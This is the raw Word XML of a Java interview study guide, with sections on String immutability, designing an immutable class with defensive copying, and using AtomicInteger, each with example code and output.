      </w:r>
    </w:p>
    <w:p w14:paraId="522FD2A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FB1D892"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE027A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E41C6F4"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A672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oth str1 and str2 point to the same object in the String pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED49F0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 both refer to the same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4E704" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317F75BF"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tempt to modify str1 (since Strings are immutable, this creates a new object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D4EC7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1 = str1.concat(" World");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F6C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3BA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str1 points to a new String object, while str2 still points to the original "Hello"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7E06D"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Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F99A7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2);  // Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A71A58"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as str1 and str2 refer to different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAAA9BE"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3E969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4246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1946AF1"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str1 and str2 point to the same object in the String pool because of the String literal "Hello".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D760E4"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call concat() on str1, it creates a new String object because Strings are immutable. The original str2 remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACCD4A"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4C6E24" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4442B" w14:textId="3218D511" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B9670B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc197867273"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an immutable class</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4B82C2EE" w14:textId="16D17573" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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n Immutable Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7C7FB"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p>
    <w:p w14:paraId="22AFCBC4"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typically declared as final to prevent subclassing. This ensures that the behavior of the immutable class cannot be altered by subclassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28E10A"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Class {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E175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ass body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3701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F7D90"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p>
    <w:p w14:paraId="3690F66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ll the fields of the class are declared as final, meaning that once they are assigned a value, they cannot be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72496E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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630C1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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B8C11"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 methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F89372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does not provide any "setter" methods that could modify the values of the fields after the object is created. This ensures the immutability of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1597E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setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D705BD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This method does not exist in an immutable class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81384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58D376"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via constructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB51D45"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of an immutable class are typically initialized via the constructor when the object is created. Once set, they cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30E43D"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String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0E1E3"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5D6804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1031FB2"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E3C0AA"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ensive copying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62FACC"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List&lt;String&gt; hobbies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732FB31" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DB7279"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List&lt;String&gt; hobbies) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C36678"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new list to ensure the original list is not modified outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EF39E"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6314CF0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586A69" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF7109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List&lt;String&gt; getHobbies() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03435D0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urn a copy of the list to prevent external modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A547A8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25EE8F7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0214E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8D1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CC7CD0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81037F2" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713EE234"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478D3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7A67592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69D42B7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List&lt;String&gt; hobbies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B958A92" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F1B7F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to initialize fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A552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mmutablePerson(String name, int age, List&lt;String&gt; hobbies) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09122A7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F2F70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BFBE0C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of the mutable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EAD0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735B8C5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22FE0F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7938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 (no setters to modify fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04672F53"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58F414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3C7BDC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90AC3" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAE91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31225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ge;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36EC3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11901E" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D28BF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when returning a mutable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C505DF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List&lt;String&gt; getHobbies() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232BC4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1F6CE16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110E4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E9BE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ain method to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FD765"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D46F57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hobbies = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5642A8E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Reading");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56573A7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Traveling");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B44DE" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3DDDB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mutablePerson person = new ImmutablePerson("John", 25, hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197003C3" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794D057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fields through getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8685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person.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27F35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 " + person.getAge());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B089E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obbies: " + person.getHobbies());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA86A91" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410D273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modify the list (will not affect the original object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A69A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Photography");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292ABE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rson's Hobbies after modification: " + person.getHobbies());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD87D2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47082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10CB1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4BDBB0"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mmutablePerson is marked as final to prevent subclassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737E0D4"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name, age, and hobbies are final and initialized via the constructor. After initialization, these fields cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B90273"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Immutable Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D530B9"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p w14:paraId="1ABB175B"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immutable objects cannot be modified after they are created, they are inherently thread-safe. Multiple threads can access the same immutable object without synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BB223"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p>
    <w:p w14:paraId="226DA569"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are often used for security-sensitive data. Since they cannot be altered, sensitive information (e.g., passwords, encryption keys) is less likely to be tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F6590"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tability and Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43983CE6"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simplify debugging and reasoning about your code, as their state never changes. This makes the program more predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4265197F"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ching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B900417"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BDC6C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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C88F1" w14:textId="6FA35B78" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="007B20A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc197867274"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="0057364C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>atomic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> integer in java</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="29B463BE" w14:textId="31AFFDE6" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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AtomicInteger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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tomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EB20E"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 Needed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Since it does not rely on locking, it is more efficient for applications with frequent read and write operations on shared variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE3D1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AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAD4A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p>
    <w:p w14:paraId="781CEC26"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current value of the atomic integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C53B6"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urrentValue = atomicInteger.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704421CA"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newValue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D136D3"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s the value of the atomic integer to a new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530FA9D"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set(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B618E"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mentAndGet():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA6805"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increments the value by 1 and returns the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22653CCB"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incrementAndGet();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9FB5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rementAndGet():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658BBF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decrements the value by 1 and returns the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41401F"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decrementAndGet();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B45B750"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AndAdd(int delta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9627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old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778C5A8"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oldValue = atomicInteger.getAndAdd(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F43B20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AndSet(int expectedValue, int newValue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13114A8D"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sets the value to the new value if the current value is equal to the expected value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965C9E2"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success = atomicInteger.compareAndSet(10, 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FEA19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AndGet(int delta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A0A6C"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new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED915"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addAndGet(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619ABA3E"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AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7BE8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atomic.AtomicInteger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085315C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C37AF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tomicIntegerExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16519985" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537B4EE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8F71C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tomicInteger with an initial value of 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660CA20D"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tomicInteger atomicInt = new AtomicInteger(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1C6DC" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78269C3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initial value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44EAC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 Value: " + atomicInt.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF103CD" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2BD260"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crement the value by 1 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B326CF1"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Increment: " + atomicInt.incrementAndGet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A18A4" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E0232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crement the value by 1 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B20F6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Decrement: " + atomicInt.decrementAndGet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06842B" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3409289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5 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67AAF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Adding 5: " + atomicInt.addAndGet(5));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1755DF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C461B0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ally compare and set the value if the current value is 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889007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oolean isSet = atomicInt.compareAndSet(5, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4A6E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mpare and Set (5 -&gt; 10): " + isSet);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4EB6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Value: " + atomicInt.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09279A53"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5815B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45730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5ACF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Value: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CABFF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Increment: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32A0F8"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Decrement: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605646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dding 5: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CEFE6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and Set (5 -&gt; 10): true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68023E8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rrent Value: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926D3EF"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AtomicInteger?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D4574"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without Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E2D83"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 allows atomic updates on the integer value without using synchronization, which improves performance by avoiding the overhead of acquiring and releasing locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4C12C"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Counters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139392DF"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particularly useful in scenarios where multiple threads need to modify a shared counter or value concurrently (e.g., in parallel processing or multi-threaded applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F763F58"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p>
    <w:p w14:paraId="1668CDA4"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tomic operations are performed without blocking, they help in reducing contention between threads and increase performance in high-concurrency environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5C8AC"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tomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C103BE2"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unters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is commonly used for counters where atomic updates are needed (e.g., request counts, number of active threads, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D63F4B"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 increment/decrement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the task requires incrementing or decrementing values by multiple threads concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746F331"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synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you want to avoid the overhead of locking and synchronization but still need thread-safe operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC7B91"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rawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D1836"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unctionality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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uitable for all use cases:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is useful only for specific scenarios where atomic operations on integers are required. For more complex data manipulations, AtomicInteger may not be the right solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D9F42" w14:textId="2330C25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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613BF1B" w14:textId="4545D40C" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00401728">
